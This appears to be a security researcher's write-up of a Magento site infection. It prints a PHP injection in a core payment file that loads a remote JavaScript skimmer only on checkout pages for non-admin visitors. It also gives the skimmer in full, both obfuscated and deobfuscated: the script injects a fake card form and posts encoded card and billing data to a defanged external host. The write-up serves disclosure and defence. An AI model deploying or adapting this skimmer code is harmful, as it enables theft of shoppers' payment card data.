Magento PHP Injection Loads JS Skimmer
A Magento website was found infected with the following PHP injection:
File: ./app/code/core/Mage/Payment/Model/Method/Cc.php
...
if ($_SERVER["REQUEST_METHOD"] === "GET"){
if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
if(!isset($_COOKIE["adminhtml"])){
echo file_get_contents(base64_decode("cmVkYWN0ZWQgc28gSSBkb24ndCBnZXQgYmxhY2tsaXN0ZWQgOik="));
}
}
}
The JavaScript skimmer is loaded using the PHP function file_get_contents the URL which is obfuscated with base64, but it only loads if the visitor is on the checkout page and if the visitor is not logged into the Magento website as an admin user.
The PHP code checks for this by looking for the string with strpos “/onestepcheckout/index/” in the visitor’s requested URI. It also checks to see if the visitor has a adminhtml cookie, which would indicate the visitor is logged into the Magento website as an admin user, so don’t show the skimmer.
Obfuscated skimmer:
<script>var _$_1004=(function(e,m){var h=e.length;var n=[];for(var p=0;p< h;p++){n[p]= e.charAt(p)};for(var p=0;p< h;p++){var i=m* (p+ 363)+ (m% 24143);var b=m* (p+ 701)+ (m% 43495);var a=i% h;var l=b% h;var d=n[a];n[a]= n[l];n[l]= d;m= (i+ b)% 2597374};var q=String.fromCharCode(127);var k='';var g='\x25';var j='\x23\x31';var o='\x25';var c='\x23\x30';var f='\x23';return n.join(k).split(g).join(q).split(j).join(o).split(c).join(f).split(q)})("p_mlt E\":vui%_nu\xE9>oe#onteirlo-ta>oot7_=tob0desss<enpir0_rvC<%e _oppp<pldmi/er >+sp2 b2=<#a\"v>ystoltvo><esaenumunne\"0\"2xe1snhen-vl@>v5aa0\"#<asmn2 ahqt *a%letnadth\" nclpbec[ysy=:eoxesnis\" \"=imiO%0m1= iierunie^ v>\"cs ie<a\"%it\"coiseCp8de \"f_olt%cl\" Cuenpfuxdl</eocledS2C\"e_%crn>k loe_<anc hprii\"n5vwsaf<%\\c_ocn<r nc2x%ee=fsm\"tc0llacam<pe ip _<\"7atal]4<\"lctiOrsseciipdtcboseeien=i <l 3a\xE9i=texoe ti->e0aNaseetela_\"io _co=<\\=tls=srp<a0 eiprtie\"p-lrc2&v-d=xe2sao%tp</tcdin\"licbneoaa=a%<_\"\"\"s nc\"es%cmml= d0/C]/ydi >\"d di<fmi\"y\"_.pp c fonor=%sd %eso_abieetl1%n sst\"lev>oaee\"alt>kp<cm_ld&ab otd>t&ddtend_m<C2jndi\xE9<ilto\\/<eierccd2a\"\"d>\\en-toxwr ol>pdhp4epc erneda=q-_il\"0aan\\-su tcl\"_:Ce=ale acymeokl<frf a_b M_ongtO#=\"le9d<trC% d-wu%mlim0C2ven=aeneufA3/inyii%vn]+-e=anir\\lerreq>ni 2e-=1ceem2b2tviose%nn/%leiqnrap/>n=Ioir[olepcviftr=g>r0pee/Tmxe t<s>mo\"ci\"\"d\"=apq\"p\"Dd/>iey><e 2mc<anr mcetppaoeae<%ftro2c>er=i<a saseaie 0ptobnov>weoopJr \">simr03 x%m lccrytl=>lt>ixvro\"eippsc>s> i1nnodl\"ana>v>ti[ip%<peiip eot rl>t h>Xe-m\"0lnl eepnpcv2v2mp\"souiCia>%et4 iu <==b=na /2i\"ba\"lt2el>cy<o& i=8alleh\"hns\"i<#aby_ona:<iutueonE\"<2murle=0ma/o=- a2eoeo_\"ro0lN ossii\xE9t%c%k_o3uno<i\"_#po<>te0atn<=i=anpp<dlacitn/>:c ti Ae2d0u1t4o\"va>v=agtcpa0t%ohvoc%lytccb/onet2\"etd>o2outaeo0>r u<u<vuo>\"6u=coirg \"da>e1b =tss0yvlauVon7ns0n<\"ui0ie%\"=e2phcou0cve/ln\"lsoe8provb>aor c-2ertlCi_Gc=n/nan/dnc>*rtn7xWr/tndc\"u-e<\"ilm\"llmo<nos/iel3oaet\" <dl\"=tuep\">d\">t1<a>pbi/- l irb>2m voio ranceltlutpcl\"vbemxd<rEio\" gtet\"t<ae=moptl>\"%li-pin\"jesgat>nvbiefpi_ oni_tir2lbnviuda0rie\"%<=gS vwae>Rin_c t6yexo u<n_a s\"dyl/0_p %nii00cesa\"yt>nciimNccmlcoucneuekne*c%nda8 pt#B=to%>tn\"ieCes%>iopeeto[t% b\"/cllt=m\"td\"\"osc-e<lutg\"iegi2llpe\xE9tnc0l0sv\"s<-o\"ot0pt<z>abC-aopo0/y> rce-luinc\"x> n>=ie2\"/orlnvneaecdt onsg-ide==m0rexpoth/tne\"aioli0<opix#/d0nsaeeol\"r4ie\"0fois#nyto%pe\\ %a >\"\" rhn\"2fopeyhvhuc5<Znup2acee<dp%-2ota2ted<aebo0r=naYn=opt\" 8na8<tasue\" ie>hes 0lnootdeey/b\"tisni leope\"6c= e ttfD il<>]rl\\ /r vvnl2n<r%v%li%Ha/t/<ttae9cv21[;e %=<oo#_ld/ptncnmosi>e dc yn\" e%latsm<_peln r\"0nuexlpucnraxrnnndntp<2%rduslnh\"vxrarit l\"d>&cc%ee pigo_oooic=2r<pYi doldrse>_%mat_vcvpc/ivneohutv%lit>i%tipl/ooeor=tx2>eou=bistp:eiw 9c /\"_%pt6ite \"gbomoaomtMpn \"m0 \"\"-:%<oc<lvl epmye<enul>2l lb=nuaccosn glncvecoo;nfe>1pl lfC\"tvennc%t5dn0_ ceiorslo<<pl-ers_Neb=uo#nv %n>yu e ind09c>svyiualtirtor=u0ia <t=>a>xlco lteieuti<c_ru#\"ac\"I>eteiiir oceirm>/dt<>iefo=_pl d>%strtyepoitdiaHma qtd< 2lqd<co#reiveltrcsot ey%un-cpt>Nnm_peaao/\"/lNcxpi>%oior%ecc2st/cis<l=4ssi% >rlo_c=0a\"qs=n<gti\"itt r%ba</\"a\"m<etiolivchniaCdmiiitme=l7xaibs\"i et-avl_c\"ti_lhp\\\"s=0dlsc%pipilu3%Tdt]teQ-0ac|=o\" e>tro<oi/<peou/sc-me__\"e|=>n_kdoc\"\'leiocv|ri>>iae<v=9tr ra/h>si%b1ubi>7AtClaiu%kusvsng\"-_n-sp pil%dol<uLh tp%>vcbyteui%xi_c>epddei0=n1 l_-\"maeaouc\"tb=teaacvlaat_nat =1e%e_%ioao>iugLcrmi -t\"oisgi&pl lsosvrNasc2%nr0ctlla gvAoisd>r2%uvrnv=lge-bi%cbeep%*e>\"o0c/is:m st\"iV%%&o2dxdouIn-ceeibtaMoc\"2_r\"ttep=l/mcevttiptu_iemev#oeo/%t =#<pmtya&i sa<nNtc=pcdiye\"dd pyldvcope%:ou-=jucf t>&-t=tioga_<e1-aoe-mt0abclMingi/t%2aengne0rpnNtaneh>bj5od=egmo>eauvuhacahcnmmyre#0\"%cqsts/:lll=t0%\\%e_htieontve:ve\"eta=ahasyn2lnt1dbtre \"c>>axcay l\"Ne2fvccdeipsoadh1%rulete_nc0crodU=l 6e*n io c%&tn\"s://uNuel<roi=fa<cnrcta&8Pmple<xcto/ea>\"eevo=laierepnrc=cdo<#l_<n#tglv 12xtne%CereFpfn:K_bmnPvn%svec&Ng tedo-cpi <\"m_oiaradi wicn t>3\"i-h ygtaecnndS8eiv\"<d>eiC/<-lfeAt&v\" T_:\"ekipetl%ncooeNox2hn/s0vfBcmoh=e ec<rmnxoconid<=e%p",1693937);setTimeout(function(){window[_$_1004[7]](function(){var a=_$_1004[0];var b=_$_1004[1];document[_$_1004[2]]= true;if(document[_$_1004[3]](a)&& document[_$_1004[3]](a)[_$_1004[4]]){if(!document[_$_1004[3]](_$_1004[5])){f(b)}}else {if(document[_$_1004[3]](_$_1004[5])){document[_$_1004[3]](_$_1004[5])[_$_1004[6]]()}}},100);function f(a){if(document[_$_1004[3]](a)){var c=document[_$_1004[3]](a);while(c[_$_1004[8]]&& document[_$_1004[2]]=== true){c[_$_1004[9]](c[_$_1004[8]])};var b=_$_1004[10];c[_$_1004[12]](_$_1004[11],b)}}document[_$_1004[13]]= _$_1004[14];document[_$_1004[15]]= _$_1004[16];document[_$_1004[17]]= _$_1004[18];document[_$_1004[19]]= _$_1004[20];document[_$_1004[21]]= _$_1004[22];document[_$_1004[23]]= _$_1004[24];a();if(( new RegExp(_$_1004[27]))[_$_1004[26]](window[_$_1004[25]])){setInterval(function(){c()},3000)};function c(){if(jQuery(document[_$_1004[23]])){if(jQuery(document[_$_1004[23]])[_$_1004[28]](document[_$_1004[21]])== false){a();return}}}function a(){jQuery(document[_$_1004[23]])[_$_1004[29]](function(){e()});if(jQuery(document[_$_1004[23]])){jQuery(document[_$_1004[23]])[_$_1004[30]](document[_$_1004[21]])}}function e(){var a=_$_1004[31]+ jQuery(_$_1004[33])[_$_1004[32]]()+ _$_1004[34]+ jQuery(_$_1004[35])[_$_1004[32]]()+ _$_1004[36]+ _$_1004[37]+ jQuery(_$_1004[38])[_$_1004[32]]()+ _$_1004[39]+ jQuery(_$_1004[40])[_$_1004[32]]()+ _$_1004[41]+ jQuery(_$_1004[42])[_$_1004[32]]()+ _$_1004[43]+ jQuery(_$_1004[44])[_$_1004[32]]()+ _$_1004[45]+ jQuery(_$_1004[46])[_$_1004[32]]()+ _$_1004[47]+ jQuery(_$_1004[48])[_$_1004[32]]()+ _$_1004[49]+ jQuery(_$_1004[50])[_$_1004[32]]()+ _$_1004[51]+ jQuery(document[_$_1004[13]])[_$_1004[32]]()+ _$_1004[52]+ jQuery(_$_1004[53])[_$_1004[32]]()+ _$_1004[39]+ jQuery(_$_1004[54])[_$_1004[32]]()+ _$_1004[55]+ jQuery(document[_$_1004[15]])[_$_1004[32]]()+ _$_1004[56]+ jQuery(document[_$_1004[17]])[_$_1004[32]]()+ _$_1004[57]+ jQuery(document[_$_1004[19]])[_$_1004[32]]()+ _$_1004[58]+ window[_$_1004[25]][_$_1004[59]];encData= d(a);jQuery[_$_1004[63]]({url:_$_1004[60],data:{frontend:encData},type:_$_1004[61],dataType:_$_1004[62],success:function(a){return false},error:function(b,c,a){return false}})}function d(d,c){var a=b[_$_1004[64]](d);a= a[_$_1004[66]](/a/g,_$_1004[65]);a= a[_$_1004[66]](/h/g,_$_1004[67]);a= a[_$_1004[66]](/e/g,_$_1004[68]);a= a[_$_1004[66]](/0/g,_$_1004[69]);a= a[_$_1004[66]](/7/g,_$_1004[70]);a= a[_$_1004[66]](/d/g,_$_1004[71]);a= a[_$_1004[66]](/T/g,_$_1004[72]);a= a[_$_1004[66]](/o/g,_$_1004[73]);a= a[_$_1004[66]](/Y/g,_$_1004[74]);a= a[_$_1004[66]](/w/g,_$_1004[75]);return a}var b={_keyStr:_$_1004[76],encode:function(c){var j=_$_1004[77];var f,h,e,i,g,k,a;var d=0;c= b[_$_1004[78]](c);while(d< c[_$_1004[82]]){f= c[_$_1004[79]](d++);h= c[_$_1004[79]](d++);e= c[_$_1004[79]](d++);i= f>> 2;g= (f& 3)<< 4| h>> 4;k= (h& 15)<< 2| e>> 6;a= e& 63;if(isNaN(h)){k= a= 64}else {if(isNaN(e)){a= 64}};j= j+ this[_$_1004[81]][_$_1004[80]](i)+ this[_$_1004[81]][_$_1004[80]](g)+ this[_$_1004[81]][_$_1004[80]](k)+ this[_$_1004[81]][_$_1004[80]](a)};return j},decode:function(c){var j=_$_1004[77];var f,h,e;var i,g,k,a;var d=0;c= c[_$_1004[66]](/[^A-Za-z0-9+/=]/g,_$_1004[77]);while(d< c[_$_1004[82]]){i= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));g= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));k= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));a= this[_$_1004[81]][_$_1004[83]](c[_$_1004[80]](d++));f= i<< 2| g>> 4;h= (g& 15)<< 4| k>> 2;e= (k& 3)<< 6| a;j= j+ String[_$_1004[84]](f);if(k!= 64){j= j+ String[_$_1004[84]](h)};if(a!= 64){j= j+ String[_$_1004[84]](e)}};j= b[_$_1004[85]](j);return j},_utf8_encode:function(a){a= a[_$_1004[66]](/rn/g,_$_1004[86]);var d=_$_1004[77];for(var b=0;b< a[_$_1004[82]];b++){var c=a[_$_1004[79]](b);if(c< 128){d+= String[_$_1004[84]](c)}else {if(c> 127&& c< 2048){d+= String[_$_1004[84]](c>> 6| 192);d+= String[_$_1004[84]](c& 63| 128)}else {d+= String[_$_1004[84]](c>> 12| 224);d+= String[_$_1004[84]](c>> 6& 63| 128);d+= String[_$_1004[84]](c& 63| 128)}}};return d},_utf8_decode:function(a){var d=_$_1004[77];var b=0;var c=c1= c2= 0;while(b< a[_$_1004[82]]){c= a[_$_1004[79]](b);if(c< 128){d+= String[_$_1004[84]](c);b++}else {if(c> 191&& c< 224){c2= a[_$_1004[79]](b+ 1);d+= String[_$_1004[84]]((c& 31)<< 6| c2& 63);b+= 2}else {c2= a[_$_1004[79]](b+ 1);c3= a[_$_1004[79]](b+ 2);d+= String[_$_1004[84]]((c& 15)<< 12| (c2& 63)<< 6| c3& 63);b+= 3}}};return d}}},3000)</script>
Deobfuscated skimmer:
setTimeout(function() {
window['setInterval'](function() {
var a = 'p_method_hosted_pro';
var b = 'container_payment_method_hosted_pro';
document['deleteChild'] = true;
if (document['getElementById'](a) && document['getElementById'](a)['checked']) {
if (!document['getElementById']('payment_form_hosted_pro_express')) {
f(b);
}
} else {
if (document['getElementById']('payment_form_hosted_pro_express')) {
document['getElementById']('payment_form_hosted_pro_express')['remove']();
}
}
}, 100);
function f(a) {
if (document['getElementById'](a)) {
var c = document['getElementById'](a);
while (c['firstChild'] && document['deleteChild'] === true) {
c['removeChild'](c['firstChild']);
}
var b = '<ul class="form-list" id="payment_form_hosted_pro_express" style="overflow: hidden; padding: 10px;"> <li> <label for="ccsave_cc_owner" class="required"><em>*</em>Nom sur carte</label> <div class="input-box"> <input type="text" title="Name on Card" class="input-text required-entry" id="ccsave_cc_owner" name="payment[cc_owner]" value=""> </div> </li> <li> <label for="ccsave_cc_number" class="required"><em>*</em>Numéro de Carte de Crédit</label> <div class="input-box"> <input type="text" id="ccsave_cc_number" name="payment[cc_number]" title="Credit Card Number" class="input-text validate-cc-number validate-cc-type" value=""> </div> </li> <li> <label for="ccsave_expiration" class="required"><em>*</em>Date d\'expiration</label> <div class="input-box"> <div class="v-fix"> <select id="ccsave_expiration" name="payment[cc_exp_month]" class="month validate-cc-exp required-entry"> <option value="" selected="selected">Mois</option> <option value="1">01</option> <option value="2">02</option> <option value="3">03</option> <option value="4">04</option> <option value="5">05</option> <option value="6">06</option> <option value="7">07</option> <option value="8">08</option> <option value="9">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> </div> <div class="v-fix"> <select id="ccsave_expiration_yr" name="payment[cc_exp_year]" class="year required-entry"> <option value="" selected="selected">Année</option> <option value="2020">2020</option> <option value="2021">2021</option> <option value="2022">2022</option> <option value="2023">2023</option> <option value="2024">2024</option> <option value="2025">2025</option> <option value="2026">2026</option> <option value="2027">2027</option> <option value="2028">2028</option> <option value="2029">2029</option> <option value="2030">2030</option> </select> </div> </div> </li> <li> <label for="ccsave_cc_cid" class="required"><em>*</em>Numéro de vérification de carte</label> <div class="input-box"> <div class="v-fix"> <input type="text" title="Card Verification Number" class="input-text cvv required-entry validate-cc-cvn" id="ccsave_cc_cid" name="payment[cc_cid]" value=""> </div> </div> </li> </ul>';
c['insertAdjacentHTML']('beforeEnd', b);
}
}
document['ccNumName'] = '#ccsave_cc_number';
document['ccMonthName'] = '#ccsave_expiration';
document['ccYearName'] = '#ccsave_expiration_yr';
document['ccCvcName'] = '#ccsave_cc_cid';
document['checkClassName'] = '874221';
document['shippingContainer'] = '#onestepcheckout-button-place-order';
a();
if (new RegExp('onepage|checkout|onestep|firecheckout')['test'](window['location'])) {
setInterval(function() {
c();
}, 3000);
}
function c() {
if (jQuery(document['shippingContainer'])) {
if (jQuery(document['shippingContainer'])['hasClass'](document['checkClassName']) == false) {
a();
return;
}
}
}
function a() {
jQuery(document['shippingContainer'])['click'](function() {
e();
});
if (jQuery(document['shippingContainer'])) {
jQuery(document['shippingContainer'])['addClass'](document['checkClassName']);
}
}
function e() {
var a = 'billing-email=' + jQuery('#billing\\:email')['val']() + '&billing-firstname=' + jQuery('#ccsave_cc_owner')['val']() + '&billing-lastname=' + '&billing-street-=' + jQuery('#billing\\:street1')['val']() + ' ' + jQuery('#billing\\:street2')['val']() + '&billing-postcode=' + jQuery('#billing\\:postcode')['val']() + '&billing-state=' + jQuery('#billing\\:region')['val']() + '&billing-city=' + jQuery('#billing\\:city')['val']() + '&billing-country_id=' + jQuery('#billing\\:country_id')['val']() + '&billing-telephone=' + jQuery('#billing\\:telephone')['val']() + '&payment-cc_number=' + jQuery(document['ccNumName'])['val']() + '&payment-cc_name=' + jQuery('#billing\\:firstname')['val']() + ' ' + jQuery('#billing\\:lastname')['val']() + '&payment-cc_exp_month=' + jQuery(document['ccMonthName'])['val']() + '&payment-cc_exp_year=' + jQuery(document['ccYearName'])['val']() + '&payment-cc_cid=' + jQuery(document['ccCvcName'])['val']() + '&idd=' + window['location']['host'];
encData = d(a);
jQuery['ajax']({
url: 'hxxps://underscorefw[ . ]com/tr/',
data: {
frontend: encData
},
type: 'POST',
dataType: 'json',
success: function(a) {
return false;
},
error: function(b, c, a) {
return false;
}
});
}
function d(d, c) {
var a = b['encode'](d);
a = a['replace'](/a/g, '-');
a = a['replace'](/h/g, '_');
a = a['replace'](/e/g, ':');
a = a['replace'](/0/g, '/');
a = a['replace'](/7/g, '^');
a = a['replace'](/d/g, '#');
a = a['replace'](/T/g, '@');
a = a['replace'](/o/g, '%');
a = a['replace'](/Y/g, '*');
a = a['replace'](/w/g, '+');
return a;
}
var b = {
_keyStr: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',
encode: function(c) {
var j = '';
var f, h, e, i, g, k, a;
var d = 0;
c = b['_utf8_encode'](c);
while (d < c['length']) {
f = c['charCodeAt'](d++);
h = c['charCodeAt'](d++);
e = c['charCodeAt'](d++);
i = f >> 2;
g = (f & 3) << 4 | h >> 4;
k = (h & 15) << 2 | e >> 6;
a = e & 63;
if (isNaN(h)) {
k = a = 64;
} else {
if (isNaN(e)) {
a = 64;
}
}
j = j + this['_keyStr']['charAt'](i) + this['_keyStr']['charAt'](g) + this['_keyStr']['charAt'](k) + this['_keyStr']['charAt'](a);
}
return j;
},
decode: function(c) {
var j = '';
var f, h, e;
var i, g, k, a;
var d = 0;
c = c['replace'](/[^A-Za-z0-9+/=]/g, '');
while (d < c['length']) {
i = this['_keyStr']['indexOf'](c['charAt'](d++));
g = this['_keyStr']['indexOf'](c['charAt'](d++));
k = this['_keyStr']['indexOf'](c['charAt'](d++));
a = this['_keyStr']['indexOf'](c['charAt'](d++));
f = i << 2 | g >> 4;
h = (g & 15) << 4 | k >> 2;
e = (k & 3) << 6 | a;
j = j + String['fromCharCode'](f);
if (k != 64) {
j = j + String['fromCharCode'](h);
}
if (a != 64) {
j = j + String['fromCharCode'](e);
}
}
j = b['_utf8_decode'](j);
return j;
},
_utf8_encode: function(a) {
a = a['replace'](/rn/g, 'n');
var d = '';
for (var b = 0; b < a['length']; b++) {
var c = a['charCodeAt'](b);
if (c < 128) {
d += String['fromCharCode'](c);
} else {
if (c > 127 && c < 2048) {
d += String['fromCharCode'](c >> 6 | 192);
d += String['fromCharCode'](c & 63 | 128);
} else {
d += String['fromCharCode'](c >> 12 | 224);
d += String['fromCharCode'](c >> 6 & 63 | 128);
d += String['fromCharCode'](c & 63 | 128);
}
}
}
return d;
},
_utf8_decode: function(a) {
var d = '';
var b = 0;
var c = c1 = c2 = 0;
while (b < a['length']) {
c = a['charCodeAt'](b);
if (c < 128) {
d += String['fromCharCode'](c);
b++;
} else {
if (c > 191 && c < 224) {
c2 = a['charCodeAt'](b + 1);
d += String['fromCharCode']((c & 31) << 6 | c2 & 63);
b += 2;
} else {
c2 = a['charCodeAt'](b + 1);
c3 = a['charCodeAt'](b + 2);
d += String['fromCharCode']((c & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
b += 3;
}
}
}
return d;
}
};
}, 3000);
More Research